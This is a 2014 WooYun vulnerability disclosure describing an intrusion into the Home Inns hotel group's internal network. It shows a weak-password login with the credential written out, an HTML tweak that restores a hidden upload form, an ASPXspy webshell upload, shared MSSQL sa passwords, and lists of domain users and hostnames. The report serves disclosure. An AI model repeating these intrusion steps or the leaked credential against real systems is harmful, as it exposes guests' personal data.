当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051579

漏洞标题:看我如何进入如家内网(今天,你开房了吗?)

相关厂商:如家酒店集团

漏洞作者: wefgod

提交时间:2014-02-21 10:38

修复时间:2014-04-07 10:43

公开时间:2014-04-07 10:43

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-21: 细节已通知厂商并且等待厂商处理中
2014-02-21: 厂商已经确认,细节仅向厂商公开
2014-03-03: 细节向核心白帽子及相关领域专家公开
2014-03-13: 细节向普通白帽子公开
2014-03-23: 细节向实习白帽子公开
2014-04-07: 细节向公众公开

简要描述:

一直觉得“看我如何……”这种标题有点太屌了,今天自己特别找一个来试试体验下感觉。
目前已经看了20多台数据库服务器,今天你开房了吗?开了?绝对可以查到。各种用户信息啊……似乎还有地方可以改房价?……总之数据库各种东西吧

详细说明:

主要原因还是http://office.homeinns.com/hcs/引起的。各种不用ikey就可以登录的弱口令,各种不防暴力破解连个验证码都没有……
先说hcs这个系统。
弱口令zuods/zuods123直接进去(这是一个老总吗?)

image006.png


各种销售人员?

image008.png


打开http://office.homeinns.com/hcs/Configure/Filesmanage.aspx

image010.png


原本我们是没有看见文件上传的,行:
先看源码:

function UpTo() 
 {
         //弹出窗口
         $('#Upinfo').dialog({autoOpen: false, modal:true, resizable:false, draggable: true, title: '文件上传', dialogClass: "login_dialog" });
         $('#ctl00_ContentPlaceHolder1_btnUpload').click( function(){$("#Upinfo").load('../Configure/UpFileLoad1.html').dialog('option', { 'width': 600, 'height': 250, 'title': '文件上传' }).dialog('open');return false; });
        
 }


哦哦有文件上传的对话框哦?咋搞出来呢?
找一个合适的位置添加如下代码:
<input type="button" id="ctl00_ContentPlaceHolder1_btnUpload" value="Click" onclick="UpTo()" />

image012.png


点击之后上传就出来咯:

image013.png


上一个!

image015.png


在下载处直接有路径
http://office.homeinns.com/Hcs/uploadfiles/ASPXspy2.aspx
最近园长有改过这货……2014版,欢迎关注!

image017.png


各种“内部文件”???

image019.png


image021.png


内网IP。
多个mssql的sa密码泄漏

image022.png


image024.png

漏洞证明:

看内网吧。以下内容适当屏蔽了一些信息

域用户:
\\021rjsh0070s.home.cn 的用户帐户
-------------------------------------------------------------------------------
2050                     2051                     2052                     
2053                     2054                     2055                     
2056                     2057                     2058                     
2059                     2060                     2061                     
2062                     2063                     2064                     
2065                     2066                     2067                     
2068                     2069                     2070                     
2071                     2072                     2073                     
2074                     2075                     2076                     
2077                     2078                     2079                     
2080                     2081                     2082                     
2083                     2084                     2085                     
2086                     2087                     2088                     
2089                     2090                     2091                     
2092                     3001                     3002                     
3003                     3004                     3006                     
3007                     3008                     3009                     
3010                     3011                     3012                     
3013                     3014                     3015                     
3016                     3017                     3018                     
4001                     4002                     4003                     
4005                     4006                     4007                     
4008                     4009                     4010                     
4011                     4012                     4013                     
7001                     7002                     7003                     
7004                     7005                     8001                     
8002                     8003                     8004                     
8008                     8009                     8010                     
8011                     alzhao                   Appadmin                 
aqsun                    aschen                   autocad                  
aychen                   bbding                   bbsun                    
………………………………
………………
ztzhong                  zxchen                   zxie                     
zxqiu                    zxwang                   zychai                   
zydeng                   zydong                   zyhu                     
zywei                    zyxie                    zyyin                    
zyzhang                  zzzuo                    茅燕华                   
命令成功完成。
Server Name            Remark
-------------------------------------------------------------------------------
\\021KAIFATEST                                                                 
\\021RISH-148WRK                                                               
\\021RJ17443W                                                                  
\\021RJSH-015WRK                                                               
\\021RJSH-108WRK                                                               
\\021RJSH-109WRK                                                               
\\021RJSH-110WRK                                                               
\\021RJSH-111WRK                                                               
\\021RJSH-112WRK                                                               
\\021RJSH-113WRK                                                               
\\021RJSH-114WRK                                                               
\\021RJSH-118WRK                                                               
\\021RJSH-119WRK                                                               
\\021RJSH-121WRK                                                               
\\021RJSH-125WRK                                                               
\\021RJSH-126WRK                                                               
\\021RJSH-129WRK                                                               
\\021RJSH-130WRK                                                               
\\021RJSH-132WRK                                                               
\\021RJSH-133WRK                                                               
…………
…………
\\021RJSH-135WRK                                                               
\\021RJSH-136WRK                                                               
\\021RJSH-137WRK                                                               
\\021RJSH-142WRK                                                               
\\021RJSH-144WRK                                                               
\\021RJSH-145WRK                                                               
\\021RJSH-147WRK                                                               
\\021RJSH-153WRK                                                               
\\021RJSH-154WRK                                                               
\\021RJSH-155WRK                                                               
\\021RJSH-156WRK                                                               
\\021RJSH-160WRK                                                               
\\021RJSH-162WRK                                                               
\\021RJSH-163WRK                                                               
\\021RJSH-166WRK                                                               
\\021RJSH-167WRK                                                               
\\021RJSH-168WRK                                                               
\\021RJSH-170WRK                                                               
\\021RJSH-172WRK                                                               
\\021RJSH-174WRK                                                               
\\021RJSH-177WRK                                                               
\\021RJSH-179WRK                                                               
\\021RJSH-182WRK                                                               
\\021RJSH-189WRK                                                               
\\021RJSH-191WRK                                                               
\\021RJSH-195WRK                                                               
\\021RJSH-197WRK                                                               
\\021RJSH-200WRK                                                               
\\021RJSH-202WRK                                                               
\\021RJSH-203WRK                                                               
\\021RJSH-204WRK                                                               
\\021RJSH-207WRK                                                               
\\021RJSH-208WRK                                                               
\\021RJSH-209W                                                                 
\\021RJSH-209WRK                                                               
\\021RJSH-210WRK                                                               
\\021RJSH-213WRK                                                               
\\021RJSH-215WRK                                                               
\\021RJSH-216WRK                                                               
\\021RJSH-217WRK                                                               
\\021RJSH-221WRK                                                               
\\021RJSH-228WRK                                                               
\\021RJSH-229WRK                                                               
\\021RJSH-230WRK                                                               
\\021RJSH-231WRK                                                               
\\021RJSH-246WRK                                                               
\\021RJSH-56W                                                                  
\\021RJSH-62WRK                                                                
\\021RJSH-72WRK                                                                
\\021RJSH-82WRK                                                                
\\021RJSH-91WRK                                                                
\\021RJSH00007S                                                                
\\021RJSH00014S                                                                
\\021RJSH00103S2                                                               
\\021RJSH00114S                                                                
\\021RJSH00135S                                                                
\\021RJSH00138S-2                                                              
\\021RJSH00139S                                                                
\\021RJSH00141S                                                                
\\021RJSH00146S                                                                
\\021RJSH00153S                                                                
\\021RJSH00154S                                                                
\\021RJSH00156S2                                                               
\\021RJSH00166S                                                                
\\021RJSH00166S2                                                               
\\021RJSH00167S                                                                
\\021RJSH00170S                                                                
\\021RJSH00176S                                                                
\\021RJSH00193S                                                                
\\021RJSH00196S2       021rjsh                                                 
\\021RJSH00197S2                                                               
\\021RJSH00198S                                                                
\\021RJSH00199S                                                                
\\021RJSH00200S                                                                
\\021RJSH00215S                                                                
\\021RJSH00216S                                                                
\\021RJSH00217S                                                                
\\021RJSH00218S                                                                
\\021RJSH00219S                                                                
\\021RJSH00221S                                                                
\\021RJSH00226S                                                                
\\021RJSH00230S                                                                
\\021RJSH00233S                                                                
\\021RJSH00242S                                                                
\\021RJSH00249S                                                                
\\021RJSH00250S                                                                
\\021RJSH00251S                                                                
\\021RJSH0026S                                                                 
\\021RJSH0027S                                                                 
\\021RJSH0029S2                                                                
\\021RJSH0030S2                                                                
\\021RJSH0031S                                                                 
\\021RJSH0035S                                                                 
\\021RJSH0037S                                                                 
\\021RJSH0038S                                                                 
\\021RJSH0039S                                                                 
\\021RJSH0041S                                                                 
\\021RJSH0045S                                                                 
\\021RJSH0046S-1                                                               
\\021RJSH0047S                                                                 
\\021RJSH0048S                                                                 
\\021RJSH0049S                                                                 
\\021RJSH0050S-1                                                               
\\021RJSH0051S                                                                 
\\021RJSH0052S                                                                 
\\021RJSH0054S2                                                                
\\021RJSH0055S                                                                 
\\021RJSH0056S                                                                 
\\021RJSH0058S                                                                 
\\021RJSH0059S                                                                 
\\021RJSH0061S                                                                 
\\021RJSH0062S                                                                 
\\021RJSH0063S                                                                 
\\021RJSH0064S                                                                 
\\021RJSH0068S2                                                                
\\021RJSH0070S                                                                 
\\021RJSH0071S                                                                 
\\021RJSH0072S-1                                                               
\\021RJSH0073S                                                                 
\\021RJSH0074S                                                                 
\\021RJSH0076S                                                                 
\\021RJSH0077S                                                                 
\\021RJSH0078S                                                                 
\\021RJSH0081S                                                                 
\\021RJSH0082S         WSUS & NAV Update Server                                
\\021RJSH0083S                                                                 
\\021RJSH0084S                                                                 
\\021RJSH0085S2                                                                
\\021RJSH0086S                                                                 
\\021RJSH0088S                                                                 
\\021RJSH0089S                                                                 
\\021RJSH0090S                                                                 
\\021RJSH0091S                                                                 
\\021RJSH0093S                                                                 
……………………………………
……………………………… 
\\RUJIA-REC5                                                                   
\\RYZHANG-PC                                                                   
\\TESTSERVER                                                                   
\\U5C9502                                                                      
\\WWW-07A33BE82F1                                                              
\\XUNIJI001                                                                    
\\XUNIJI002


先看192.168.210.*段:

image026.png


image027.png


image028.png


匿名ftp

image029.png


还有各种SA相同口令,超过15个,可以任意脱裤!包含非常多的用户数据,如用户真实姓名、身份证和密码。

image030.png


image031.png


看看数据库服务器里面的数据内容
192.168.210.35,用户数据,太敏感,就不截图太多了免得泄漏信息。下面的也是点到为止避免扩大危害

image032.png


image034.png


image035.png


192.168.210.38:我是不是可以改房价?

image037.png


192.168.210.72

image039.png


192.168.210.65

image040.png


192.168.210.72

image041.png


192.168.210.251

image043.png


172.23.100.*段:

image045.png


多个SA口令:

image046.png


172.23.100.21:

image047.png


image049.png


172.23.100.109

image051.png


image053.png


System直接可以搞:

image055.png


具体就不再操作了。其它ip其实还有类似的问题,我就不再弄了。

修复方案:

多种类型……综合分析看看怎么修复吧
另外乌云@疯狗 @xsser 可以给个雷吗?好久没被雷了

版权声明:转载请注明来源 wefgod@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-02-21 11:52

厂商回复:

感谢关注!!!

最新状态:

暂无